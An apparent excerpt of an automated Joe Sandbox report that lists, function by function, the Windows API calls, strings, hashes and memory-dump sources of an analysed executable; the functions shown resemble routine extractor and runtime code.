• Instruction ID: 12c72249b292c8b2345f133feae8e126f7b5644a6aa0d421f0c0df8ed0de5eed
• Opcode Fuzzy Hash: 4c139685af4dde5bfd22e27ee6cc4ee61f38835ff4dbb2d538a87aaabbf06dd6
• Instruction Fuzzy Hash: A6A001A66A9222BE320A66657E67D7A126CC8D4BA5330893EF4028C481A9806D851071
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: f4bd62c23b1b45df3655da61edea574ffbf3dce782436fc8e4264b62296dd045
• Instruction ID: 12c72249b292c8b2345f133feae8e126f7b5644a6aa0d421f0c0df8ed0de5eed
• Opcode Fuzzy Hash: f4bd62c23b1b45df3655da61edea574ffbf3dce782436fc8e4264b62296dd045
• Instruction Fuzzy Hash: A6A001A66A9222BE320A66657E67D7A126CC8D4BA5330893EF4028C481A9806D851071
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetEndOfFile.KERNELBASE(?,0031A083,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,0031922F,-00008BE0), ref: 0031B19C
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
• Opcode ID: 91f97065e69a3aa1093bdb40e1fd9f9183737abbdfa7335c92d2543b0bccf542
• Instruction ID: 27c4e95a7be124335864a8e2bf087cb965f445aa8d43280f7fe4ee54bc558b55
• Opcode Fuzzy Hash: 91f97065e69a3aa1093bdb40e1fd9f9183737abbdfa7335c92d2543b0bccf542
• Instruction Fuzzy Hash: E8A01234040009468D411B30D90410C7710E7117C070001A45006CE061CB2244178600
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetCurrentDirectoryW.KERNELBASE(?,0032BFF6,00361890,00000000,00362892,00000006), ref: 0032BC1D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
• Opcode ID: 254c77f9ba2a7f740dd6bd6c261c25fa8233f9fcbb42d9a7ccde67f39b774ec9
• Instruction ID: ccee7a7de138a4e1f76ffd588a625abe7c2bf87736a6a6c9294de36644aa48ce
• Opcode Fuzzy Hash: 254c77f9ba2a7f740dd6bd6c261c25fa8233f9fcbb42d9a7ccde67f39b774ec9
• Instruction Fuzzy Hash: 83A011322002008BA2020B328F0AA0EBAAAAFA2B00F00C038A00088030EB3088B0AA00
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
  • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
• SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0032D4B1
• EndDialog.USER32(?,00000006), ref: 0032D4C4
• GetDlgItem.USER32(?,0000006C), ref: 0032D4E0
• SetFocus.USER32(00000000), ref: 0032D4E7
• SetDlgItemTextW.USER32(?,00000065,?), ref: 0032D521
• SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0032D558
• FindFirstFileW.KERNEL32(?,?), ref: 0032D56E
  • Part of subcall function 0032BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0032BC3F
  • Part of subcall function 0032BC2B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0032BC50
  • Part of subcall function 0032BC2B: SystemTimeToFileTime.KERNEL32(?,?), ref: 0032BC5E
  • Part of subcall function 0032BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0032BC6C
  • Part of subcall function 0032BC2B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0032BC87
  • Part of subcall function 0032BC2B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0032BCAE
  • Part of subcall function 0032BC2B: _swprintf.LIBCMT ref: 0032BCD4
• _swprintf.LIBCMT ref: 0032D5B7
  • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
• SetDlgItemTextW.USER32(?,0000006A,?), ref: 0032D5CA
• FindClose.KERNEL32(00000000), ref: 0032D5D1
• _swprintf.LIBCMT ref: 0032D620
• SetDlgItemTextW.USER32(?,00000068,?), ref: 0032D633
• SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0032D650
• _swprintf.LIBCMT ref: 0032D683
• SetDlgItemTextW.USER32(?,0000006B,?), ref: 0032D696
• _swprintf.LIBCMT ref: 0032D6E0
• SetDlgItemTextW.USER32(?,00000069,?), ref: 0032D6F3
  • Part of subcall function 0032C093: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0032C0B9
  • Part of subcall function 0032C093: GetNumberFormatW.KERNEL32(00000400,00000000,?,0035072C,?,?), ref: 0032C108
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
• String ID: %s %s$REPLACEFILEDLG
• API String ID: 3464475507-439456425
• Opcode ID: bba381b37d52b3b4d69d10d07c217a68aca1a6ece90a5a3a7cd72c025bb8faf8
• Instruction ID: 41693c64837133dbe57697bdd85d41e87222ea52be2165c432327aad2dfb9e39
• Opcode Fuzzy Hash: bba381b37d52b3b4d69d10d07c217a68aca1a6ece90a5a3a7cd72c025bb8faf8
• Instruction Fuzzy Hash: 3771E5725483147BE233AB64EC49FFF77ACEB8A700F410819F64DD6091DBB1A9448B62
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00330A16
• IsDebuggerPresent.KERNEL32 ref: 00330AE2
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00330B02
• UnhandledExceptionFilter.KERNEL32(?), ref: 00330B0C
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 1bfc1ed0a8bed2dbe56eb8e6a072415302e5e6cfbd0ee7e20904a84b86adf9ec
• Instruction ID: c7997bbf190ca2a4b253ff7193ed77d00fb9efbbe5d85fbda27def347df89f49
• Opcode Fuzzy Hash: 1bfc1ed0a8bed2dbe56eb8e6a072415302e5e6cfbd0ee7e20904a84b86adf9ec
• Instruction Fuzzy Hash: 2D3129B5D0521C9BDB21DFA4DD897CDBBB8BF08304F1041AAE40DAB250EB759A84CF44
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0032D889
  • Part of subcall function 0032C504: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0032C5EB
• _wcslen.LIBCMT ref: 0032DB4F
• _wcslen.LIBCMT ref: 0032DB58
• SetWindowTextW.USER32(?,?), ref: 0032DBB6
• _wcslen.LIBCMT ref: 0032DBF8
• _wcsrchr.LIBVCRUNTIME ref: 0032DD40
• GetDlgItem.USER32(?,00000066), ref: 0032DD7B
• SetWindowTextW.USER32(00000000,?), ref: 0032DD8B
• SendMessageW.USER32(00000000,00000143,00000000,0036389A), ref: 0032DD99
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0032DDC4
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
• String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
• API String ID: 2804936435-312220925
• Opcode ID: 220a57ea868a1f8b2897dda7cd0c3d39565b8716bf8c071c3e341fa17dfe1a47
• Instruction ID: 97c4309b4624e9331e22a6fde16e0d99f28f31b5fbdcbe418b98c5d632615fd0
• Opcode Fuzzy Hash: 220a57ea868a1f8b2897dda7cd0c3d39565b8716bf8c071c3e341fa17dfe1a47
• Instruction Fuzzy Hash: E2E16672900128AADF26DBA4ED85EEE73BCEF05710F5540A6F609E7054EF749E84CB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00317AB4
• _wcslen.LIBCMT ref: 00317B1D
• _wcslen.LIBCMT ref: 00317B8E
  • Part of subcall function 00318704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00318713
  • Part of subcall function 00318704: OpenProcessToken.ADVAPI32(00000000), ref: 0031871A
  • Part of subcall function 00318704: GetLastError.KERNEL32 ref: 00318759
  • Part of subcall function 00318704: CloseHandle.KERNEL32(?), ref: 00318768
  • Part of subcall function 0031B470: DeleteFileW.KERNELBASE(?,00000000,?,0031A438,?,?,?,?,0031892B,?,?,?,0034380F,000000FF), ref: 0031B481
  • Part of subcall function 0031B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,0031A438,?,?,?,?,0031892B,?,?,?,0034380F,000000FF), ref: 0031B4AF
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00317C43
• CloseHandle.KERNEL32(00000000), ref: 00317C5F
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00317DAB
  • Part of subcall function 0031B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00317ED0,?,?,?,00000000), ref: 0031B04C
  • Part of subcall function 0031B032: SetFileTime.KERNELBASE(?,?,?,?), ref: 0031B100
  • Part of subcall function 0031A880: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0031A83D,?,?,?,?,?,0034380F,000000FF), ref: 0031A89B
  • Part of subcall function 0031B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B8FA
  • Part of subcall function 0031B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B92B
Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Close$AttributesCreateDeleteHandleProcess_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationOpenTimeToken
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 1504485742-3508440684
                                                                                              • Opcode ID: 0d91958e13cb59c48629954ec74f891d0eea01efe62dbd63305dd2d0d633207f
                                                                                              • Instruction ID: c8e203639ee71f78b7f3a6b2d54f6cd9c21ab2a0dd9abd60e7fdd00724479126
                                                                                              • Opcode Fuzzy Hash: 0d91958e13cb59c48629954ec74f891d0eea01efe62dbd63305dd2d0d633207f
                                                                                              • Instruction Fuzzy Hash: F4C1B775904209AEDB2BDB64CC86FEEB7BCAF08310F054565F545EB181DB34EA84CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 0031F62E
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                                • Part of subcall function 003230F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00353070,00000200,0031EC48,00000000,?,00000050,00353070), ref: 00323112
                                                                                              • _strlen.LIBCMT ref: 0031F64F
                                                                                              • SetDlgItemTextW.USER32(?,00350274,?), ref: 0031F6AF
                                                                                              • GetWindowRect.USER32(?,?), ref: 0031F6E9
                                                                                              • GetClientRect.USER32(?,?), ref: 0031F6F5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0031F795
                                                                                              • GetWindowRect.USER32(?,?), ref: 0031F7C2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0031F7FB
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 0031F803
                                                                                              • GetWindow.USER32(?,00000005), ref: 0031F80E
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0031F83B
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0031F8AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              • API String ID: 2407758923-2512411981
                                                                                              • Opcode ID: 0628dad87f6b2f855842c35017d6f3ace98a6554ffd8938066f1acdb6b36e2ed
                                                                                              • Instruction ID: e26626aaeda2c95029a34adc57c498c0b062be449c1e76ea319047b92bfdd43f
                                                                                              • Opcode Fuzzy Hash: 0628dad87f6b2f855842c35017d6f3ace98a6554ffd8938066f1acdb6b36e2ed
                                                                                              • Instruction Fuzzy Hash: 5381C2722083019FD716DF68CD89FAFBBE8EB88704F04092DF985D7290D671E8458B52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0033DD26
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D8DE
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D8F0
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D902
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D914
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D926
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D938
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D94A
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D95C
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D96E
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D980
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D992
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D9A4
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D9B6
                                                                                              • _free.LIBCMT ref: 0033DD1B
                                                                                                • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
                                                                                                • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
                                                                                              • _free.LIBCMT ref: 0033DD3D
                                                                                              • _free.LIBCMT ref: 0033DD52
                                                                                              • _free.LIBCMT ref: 0033DD5D
                                                                                              • _free.LIBCMT ref: 0033DD7F
                                                                                              • _free.LIBCMT ref: 0033DD92
                                                                                              • _free.LIBCMT ref: 0033DDA0
                                                                                              • _free.LIBCMT ref: 0033DDAB
                                                                                              • _free.LIBCMT ref: 0033DDE3
                                                                                              • _free.LIBCMT ref: 0033DDEA
                                                                                              • _free.LIBCMT ref: 0033DE07
                                                                                              • _free.LIBCMT ref: 0033DE1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID: h5
                                                                                              • API String ID: 161543041-1056193760
                                                                                              • Opcode ID: 79b11954905930149f28d4258081330c4aee0b8516f5918b89fafde5a07dc1ea
                                                                                              • Instruction ID: 12b42db9fad93f94404b208b8bd57cef4b081d3c51c9bee26021fbb8dd191b29
                                                                                              • Opcode Fuzzy Hash: 79b11954905930149f28d4258081330c4aee0b8516f5918b89fafde5a07dc1ea
                                                                                              • Instruction Fuzzy Hash: 2E3157316047009FEB22AA39EC86F5AB7E9FF10710F194829E489DB161DF31AC80CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 0032E811
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0032E83D
                                                                                                • Part of subcall function 00323316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,0031D523,00000000,.exe,?,?,00000800,?,?,?,00329E5C), ref: 0032332C
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0032E859
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0032E870
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0032E884
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0032E8AD
                                                                                              • DeleteObject.GDI32(00000000), ref: 0032E8B4
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0032E8BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: 2d969724d74397e9f4daf3203400ce415d7345ddd3fa6e9a1ef0154f34b40eac
                                                                                              • Instruction ID: 52ecc915bb1a56ae3b303e9ddf5712d59ad7e9e9d54fdacd3eaf0834970accfc
                                                                                              • Opcode Fuzzy Hash: 2d969724d74397e9f4daf3203400ce415d7345ddd3fa6e9a1ef0154f34b40eac
                                                                                              • Instruction Fuzzy Hash: BF112132500B207BEA336BB0BC0AFAF779CAF00B11F410434FA95A90D2DBA48D4586A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0033A435
                                                                                                • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
                                                                                                • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
                                                                                              • _free.LIBCMT ref: 0033A441
                                                                                              • _free.LIBCMT ref: 0033A44C
                                                                                              • _free.LIBCMT ref: 0033A457
                                                                                              • _free.LIBCMT ref: 0033A462
                                                                                              • _free.LIBCMT ref: 0033A46D
                                                                                              • _free.LIBCMT ref: 0033A478
                                                                                              • _free.LIBCMT ref: 0033A483
                                                                                              • _free.LIBCMT ref: 0033A48E
                                                                                              • _free.LIBCMT ref: 0033A49C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 3b12f5959b20c32ca6874b8646a1b63990b85323bafffb201ff4be2a3e47c924
                                                                                              • Instruction ID: 98fc258c38f4639b6e5058fda9189a6534770d082f2be0e13d45ac83e0a6ab95
                                                                                              • Opcode Fuzzy Hash: 3b12f5959b20c32ca6874b8646a1b63990b85323bafffb201ff4be2a3e47c924
                                                                                              • Instruction Fuzzy Hash: FF11B676210508BFCB02EF54CC92CD93BB5EF14750F4581A5FA488F232DA31EE519B81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: 13c42c48653b20e183d2805ae932bcd74a9eab6c249c41290ffc03f307b25d08
                                                                                              • Instruction ID: e8d3b4e972fccc476ceb2ef478db4748e84c0f406b5c7fd232e636e92d1a5243
